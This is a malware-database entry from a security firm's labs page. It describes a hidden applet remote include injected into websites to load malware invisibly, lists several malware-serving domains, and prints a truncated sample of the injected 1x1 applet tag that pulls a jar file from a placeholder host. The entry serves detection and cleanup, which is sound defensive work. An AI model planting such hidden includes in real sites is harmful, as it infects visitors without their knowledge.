Sucuri Malware Labs

Malware entry: MW:APPLET:HD522Home | Notes | Malware data | Signatures | Tools | About

Description:

A hidden (and possibly malicious) applet remote include was identified. It is sometimes encoded with javascript to hide the fact that an applet call is present. Loads malware from multiple sources:
fenkaololo.com discountsummer.ru test-traffic.narod.ru cvfplmpsap.co.tv (and many other domains).

This is used to load malware from external web sites while not being visible to the user.

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup

Malware dump (sample of malware):

<applet name="adobe" code="adobeflash.class" archive="http://www.site.com/flash.jar" width="1" height="1"...

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb